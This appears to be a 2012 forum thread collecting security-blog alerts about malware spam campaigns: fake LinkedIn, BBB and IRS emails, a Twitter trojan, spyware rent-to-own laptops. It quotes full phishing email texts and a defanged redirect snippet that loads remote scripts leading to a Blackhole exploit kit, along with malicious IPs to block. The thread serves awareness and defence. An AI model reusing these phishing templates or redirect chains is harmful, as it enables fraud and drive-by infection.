SPAM frauds, fakes, and other MALWARE deliveries...

[AplusWebMaster]

FYI...

LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/link...919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___

Fake 'KLM e-Ticket' attempts to install backdoor
- http://community.websense.com/blogs/...-backdoor.aspx
21 Sep 2012 - "... malicious zipped attachment..."
___

New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/...loit-kit-v2-0/
Sep 18, 2012

[AplusWebMaster]

FYI...

BBB malicious SPAM flood
- http://community.websense.com/blogs/...pam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-fi...D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-fi...2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___

BBB Spam / 108.178.59.11
- http://blog.dynamoo.com/2012/09/bbb-...081785911.html
24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."

- http://centralops.net/co/DomainDossier.aspx
108.178.59.11
network:State: Italy
OriginAS: AS32475

- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."

[AplusWebMaster]

FYI...

Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012...video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.c...cked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.c...ware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."

[AplusWebMaster]

FYI...

Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil...817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."

- http://centralops.net/co/DomainDossier.aspx
network: IP-Network: 108.178.59.0/26
network: State:Italy
network: Country-Code: IT
___

BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
Blocking 199.195.116.185 would probably be prudent..."

[AplusWebMaster]

FYI...

FTC halts computer spying
* http://www.ftc.gov/opa/2012/09/designware.shtm
09/25/2012

Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leobowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/201...yware-scandal/

[AplusWebMaster]

FYI...

Spear Phishing Emails increase 56% ...
- http://blog.fireeye.com/research/201...ng-emails.html
2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
• File names relating to shipping grew from 19.20% to 26.35%.
• Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
• Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."

* http://www.fireeye.com/resources/pdf...hing-words.pdf

[AplusWebMaster]

FYI...

IRS SPAM - 3 different versions ...
- http://blog.dynamoo.com/2012/09/irs-...ancom-and.html
26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
Date: Wed, 26 Sep 2012 20:44:47 +0530
From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Hello,
Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
For detail information, please refer to:
https ://www.irs .gov/Login.aspx?u=E8710D9E9
Email address: [redacted]
Sincerely yours,
Barry Griffin
IRS Customer Service representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 11:09:45 -0400
From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Dear business owners,
Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
For the details please refer to:
https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
Email address: [redacted]
Sincerely yours,
Damon Abbott
Internal Revenue Service Representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 19:53:28 +0400
From: Internal Revenue Service [weirdpr6@polysto.com]
To: [[redacted]]
Subject: IRS report of not approved tax bank transfer
Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
Rejected Tax transaction
Tax Transaction ID: 52007291963155
Reason ID See details in the report below
State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV

Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."